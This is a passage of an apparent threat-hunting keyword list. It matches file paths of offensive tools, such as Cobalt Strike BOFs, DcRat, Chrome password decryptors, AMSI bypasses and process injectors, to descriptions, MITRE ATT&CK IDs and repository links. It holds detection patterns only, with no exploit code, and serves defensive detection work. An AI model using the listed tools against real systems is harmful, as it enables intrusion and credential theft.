APT29,C2,https://github.com/rsmudge/Malleable-C2-Profiles,1,1,N/A,10,10,1362,429,2021-05-18T14:45:39Z,2014-07-14T15:02:42Z -*/CWoNaJLBo/VTNeWw11213/*,offensive_tool_keyword,cobaltstrike,Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. 
These profiles work with Cobalt Strike 3.x,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/Malleable-C2-Profiles,1,1,N/A,10,10,1362,429,2021-05-18T14:45:39Z,2014-07-14T15:02:42Z -*/Cybellum*,offensive_tool_keyword,Github Username,Zero day code injection and vulnerabilities github repo,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/Cybellum,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/CyDefUnicorn*,offensive_tool_keyword,Github Username,pentest tools repo,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/CyDefUnicorn,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/D1rkInject.git*,offensive_tool_keyword,D1rkInject,Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state,T1055 - T1055.012 - T1055.002 - T1574.002,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/D1rkInject,1,1,N/A,9,2,129,24,2023-08-02T02:45:46Z,2023-08-02T02:13:55Z -*/d4em0n/exrop*,offensive_tool_keyword,Exrop,Exrop is automatic ROP chains generator tool which can build 
gadget chain automatically from given binary and constraints,T1554,TA0003,N/A,N/A,Exploitation tools,https://github.com/d4em0n/exrop,1,1,N/A,N/A,3,265,26,2020-02-21T08:01:06Z,2020-01-19T05:09:00Z -*/daap-get-library.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/DAMP.git*,offensive_tool_keyword,DAMP,The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.,T1222 - T1222.002 - T1548 - T1548.002,TA0005 ,N/A,N/A,Persistence,https://github.com/HarmJ0y/DAMP,1,1,N/A,10,4,356,78,2019-07-25T21:18:37Z,2018-04-06T22:13:58Z -*/DanMcInerney/ridenum*,offensive_tool_keyword,icebreaker,Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment,T1110.001 - T1110.003 - T1059.003,TA0006 - TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/DanMcInerney/icebreaker,1,0,N/A,10,10,1175,168,2018-10-24T18:14:53Z,2017-12-04T03:42:28Z -*/daphne.git*,offensive_tool_keyword,daphne,evade auditd by tampering via ptrace,T1054.004 - T1012 - T1057,TA0003 - TA0007,N/A,N/A,Defense Evasion,https://github.com/codewhitesec/daphne,1,1,N/A,8,1,12,2,2023-08-03T08:31:40Z,2023-07-31T11:57:29Z -*/daphne-x64*,offensive_tool_keyword,daphne,evade auditd by tampering via ptrace,T1054.004 - T1012 - T1057,TA0003 - TA0007,N/A,N/A,Defense Evasion,https://github.com/codewhitesec/daphne,1,1,N/A,8,1,12,2,2023-08-03T08:31:40Z,2023-07-31T11:57:29Z -*/darkarmour.git*,offensive_tool_keyword,darkarmour,Store and execute an encrypted windows binary from inside memorywithout a single bit touching disk.,T1055.012 - T1027 - T1564.001,TA0005,N/A,N/A,Defense 
Evasion,https://github.com/bats3c/darkarmour,1,1,N/A,10,7,644,119,2020-04-13T10:56:23Z,2020-04-06T20:48:20Z -*/DarkCoderSc/*,offensive_tool_keyword,win-brute-logon,Bruteforce cracking tool for windows users,T1110 - T1110.001 - T1110.002,TA0008 - TA0006 - TA0005,N/A,N/A,Credential Access,https://github.com/DarkCoderSc/win-brute-logon,1,1,N/A,N/A,10,1026,184,2022-12-27T12:06:40Z,2020-05-14T21:46:50Z -*/darkexe.py*,offensive_tool_keyword,FourEye,AV Evasion Tool,T1059 - T1059.001 - T1059.005 - T1027 - T1027.005,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/lengjibo/FourEye,1,1,N/A,10,8,724,154,2021-12-08T11:55:15Z,2020-12-11T01:29:58Z -*/darkhotel.py*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,1,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*/DarkLoadLibrary.git*,offensive_tool_keyword,DarkLoadLibrary,LoadLibrary for offensive operations,T1071.001 - T1055.002 - T1055.004,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/bats3c/DarkLoadLibrary,1,1,N/A,10,9,874,184,2021-10-22T07:27:58Z,2021-06-17T08:33:47Z -*/darkweb2017-top100.txt*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*/DarkWidow.git*,offensive_tool_keyword,DarkWidow,Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned 
process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing,T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140,TA0005 - TA0003 - TA0002 - TA0004,N/A,N/A,Defense Evasion,https://github.com/reveng007/DarkWidow,1,1,N/A,10,3,268,38,2023-08-03T22:37:44Z,2023-07-24T13:59:16Z -*/data/attacks/*.txt*,offensive_tool_keyword,wapiti,Web vulnerability scanner written in Python3,T1592 - T1592.003,TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/wapiti-scanner/wapiti,1,1,N/A,N/A,8,785,132,2023-09-27T07:26:22Z,2020-06-06T20:17:55Z -*/data/auxiliary/gather*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/data/empire.db*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*/data/exploits/*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/data/shellcode*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/DavRelayUp.git*,offensive_tool_keyword,DavRelayUp,DavRelayUp - a universal no-fix local privilege escalation in domain-joined windows workstations where LDAP signing is not enforced,T1078 - T1078.004 - T1068,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/ShorSec/DavRelayUp,1,1,N/A,9,5,446,70,2023-06-05T09:17:06Z,2023-06-05T07:49:39Z -*/DavRelayUp/*,offensive_tool_keyword,DavRelayUp,DavRelayUp - a universal no-fix local privilege escalation in domain-joined windows workstations where LDAP signing is not enforced,T1078 - T1078.004 - T1068,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/ShorSec/DavRelayUp,1,1,N/A,9,5,446,70,2023-06-05T09:17:06Z,2023-06-05T07:49:39Z -*/daytime.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/dazzleUP.git*,offensive_tool_keyword,dazzleUP,A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.,T1068 - T1088 - T1210 - T1210.002,TA0004 - TA0007,N/A,N/A,Privilege Escalation,https://github.com/hlldz/dazzleUP,1,1,N/A,9,5,479,70,2020-07-23T08:48:43Z,2020-07-21T21:06:46Z -*/db2_default_userpass.txt*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. 
open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/db2-das-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/dbc2Loader*,offensive_tool_keyword,DBC2,DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.,T1105 - T1071.004 - T1102,TA0003 - TA0002 - TA0008,N/A,N/A,C2,https://github.com/Arno0x/DBC2,1,1,N/A,10,10,269,85,2017-10-27T07:39:02Z,2016-12-14T10:35:56Z -*/DCOM Lateral Movement/*,offensive_tool_keyword,cobaltstrike,Collection of beacon BOF written to learn windows and cobaltstrike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Yaxser/CobaltStrike-BOF,1,1,N/A,10,10,297,54,2023-02-24T13:12:14Z,2020-10-08T01:12:41Z -*/dcomhijack.git*,offensive_tool_keyword,dcomhijack,Lateral 
Movement Using DCOM and DLL Hijacking,T1021 - T1021.003 - T1574 - T1574.007 - T1574.002,TA0008 - TA0005 - TA0002,N/A,N/A,Lateral Movement,https://github.com/WKL-Sec/dcomhijack,1,1,N/A,10,3,228,23,2023-06-18T20:34:03Z,2023-06-17T20:23:24Z -*/DCOMPotato.git*,offensive_tool_keyword,DCOMPotato,Service DCOM Object and SeImpersonatePrivilege abuse.,T1548.002 - T1134.002,TA0004 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/zcgonvh/DCOMPotato,1,1,N/A,10,4,326,46,2022-12-09T01:57:53Z,2022-12-08T14:56:13Z -*/DcRat.git*,offensive_tool_keyword,DcRat,DcRat C2 A simple remote tool in C#,T1071 - T1021 - T1003,TA0011,N/A,N/A,C2,https://github.com/qwqdanchun/DcRat,1,1,N/A,10,10,817,352,2022-02-07T05:37:09Z,2021-03-12T11:00:37Z -*/DcRat.sln*,offensive_tool_keyword,DcRat,DcRat C2 A simple remote tool in C#,T1071 - T1021 - T1003,TA0011,N/A,N/A,C2,https://github.com/qwqdanchun/DcRat,1,1,N/A,10,10,817,352,2022-02-07T05:37:09Z,2021-03-12T11:00:37Z -*/dcrypt.exe*,offensive_tool_keyword,DiskCryptor,DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions,T1486 ,TA0040,N/A,N/A,Ransomware,https://github.com/DavidXanatos/DiskCryptor,1,1,N/A,10,4,361,96,2023-08-13T11:20:25Z,2019-04-20T14:51:18Z -*/dcrypt_setup.exe*,offensive_tool_keyword,DiskCryptor,DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions,T1486 ,TA0040,N/A,N/A,Ransomware,https://github.com/DavidXanatos/DiskCryptor,1,1,N/A,10,4,361,96,2023-08-13T11:20:25Z,2019-04-20T14:51:18Z -*/dcsync_*.txt,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z 
-*/DeathStar/DeathStar.py*,offensive_tool_keyword,icebreaker,Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment,T1110.001 - T1110.003 - T1059.003,TA0006 - TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/DanMcInerney/icebreaker,1,0,N/A,10,10,1175,168,2018-10-24T18:14:53Z,2017-12-04T03:42:28Z -*/deb.parrot.sh/*,offensive_tool_keyword,parrot os,Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.,T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105,TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011,N/A,N/A,Exploitation OS,https://www.parrotsec.org/download/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/DebugAmsi.git*,offensive_tool_keyword,DebugAmsi,DebugAmsi is another way to bypass AMSI through the Windows process debugger mechanism.,T1562.001 - T1050.005,TA0005 - TA0003,N/A,N/A,Defense Evasion,https://github.com/MzHmO/DebugAmsi,1,1,N/A,10,1,71,17,2023-09-18T17:17:26Z,2023-08-28T07:32:54Z -*/decrypt-chrome-passwords*,offensive_tool_keyword,decrypt-chrome-passwords,A simple program to decrypt chrome password saved on your machine.,T1555.003 - T1112 - T1056.001,TA0006 - TA0009 - TA0040,N/A,N/A,Credential Access,https://github.com/ohyicong/decrypt-chrome-passwords,1,1,N/A,10,7,673,147,2023-10-02T18:22:13Z,2020-12-28T15:11:12Z -*/decrypted.dmp*,offensive_tool_keyword,PPLBlade,Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.,T1003.001 - T1027.004 - T1560.001 - T1039 - T1570,TA0006 - TA0005 - TA0010 - TA0003,N/A,N/A,Credential Access - Data Exfiltration,https://github.com/tastypepperoni/PPLBlade,1,0,N/A,10,4,324,36,2023-08-30T07:59:51Z,2023-08-29T19:36:04Z -*/deepce.sh *--install*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment 
with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*/defanger.go*,offensive_tool_keyword,Slackor,A Golang implant that uses Slack as a command and control server,T1059.003 - T1071.004 - T1562.001,TA0002 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/Coalfire-Research/Slackor,1,0,N/A,10,10,451,108,2023-02-25T03:35:15Z,2019-06-18T16:01:37Z -*/DefaultCreds_db.json*,offensive_tool_keyword,DefaultCreds-cheat-sheet,One place for all the default credentials to assist the Blue/Red teamers activities on finding devices with default password,T1110.001 - T1110.003,TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/ihebski/DefaultCreds-cheat-sheet,1,1,N/A,N/A,10,4664,610,2023-07-15T22:16:49Z,2021-01-01T19:02:36Z -*/defender-exclusions/*defender*,offensive_tool_keyword,cobaltstrike,Collection of CobaltStrike beacon object files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - 
Mustang Panda - Chimera - APT29,C2,https://github.com/pwn1sher/CS-BOFs,1,1,N/A,10,10,100,23,2022-02-14T09:47:30Z,2021-01-18T08:54:48Z -*/defender-exclusions/*exclusion*,offensive_tool_keyword,cobaltstrike,Collection of CobaltStrike beacon object files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/pwn1sher/CS-BOFs,1,1,N/A,10,10,100,23,2022-02-14T09:47:30Z,2021-01-18T08:54:48Z -*/Defense_Evasion.sh*,offensive_tool_keyword,AutoC2,AutoC2 is a bash script written to install all of the red team tools that you know and love,T1059.004 - T1129 - T1486,TA0005 - TA0002 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2,1,0,N/A,10,4,348,73,2023-09-30T13:40:08Z,2022-03-23T15:52:41Z -*/DelegationBOF/*,offensive_tool_keyword,cobaltstrike,This tool uses LDAP to check a domain for known abusable Kerberos delegation settings,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 
- T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/IcebreakerSecurity/DelegationBOF,1,1,N/A,10,10,115,21,2022-05-04T14:00:36Z,2022-03-28T20:14:24Z -*/DelegationBOF/*,offensive_tool_keyword,DelegationBOF,This tool uses LDAP to check a domain for known abusable Kerberos delegation settings. Currently. it supports RBCD. Constrained. Constrained w/Protocol Transition. and Unconstrained Delegation checks.,T1098 - T1214 - T1552,TA0006,N/A,N/A,Credential Access,https://github.com/IcebreakerSecurity/DelegationBOF,1,1,N/A,N/A,10,115,21,2022-05-04T14:00:36Z,2022-03-28T20:14:24Z -*/deluge-rpc-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/demiguise.py*,offensive_tool_keyword,demiguise,The aim of this project is to generate .html files that contain an encrypted HTA file. The idea is that when your target visits the page. 
the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user. This is an evasion technique to get round content / file-type inspection implemented by some security-appliances. This tool is not designed to create awesome HTA content. There are many other tools/techniques that can help you with that. What it might help you with is getting your HTA into an environment in the first place. and (if you use environmental keying) to avoid it being sandboxed.,T1564 - T1071.001 - T1071.004 - T1059 - T1070,TA0002 - TA0011 - TA0008,N/A,N/A,Defense Evasion,https://github.com/nccgroup/demiguise,1,1,N/A,9,10,1321,262,2022-11-09T08:12:25Z,2017-07-26T08:56:15Z -*/demo_bof.c*,offensive_tool_keyword,cobaltstrike,A tool to run object files mainly beacon object files (BOF) in .Net.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nettitude/RunOF,1,1,N/A,10,10,129,22,2023-01-06T15:30:05Z,2022-02-21T13:53:39Z -*/demon.x64.bin*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and 
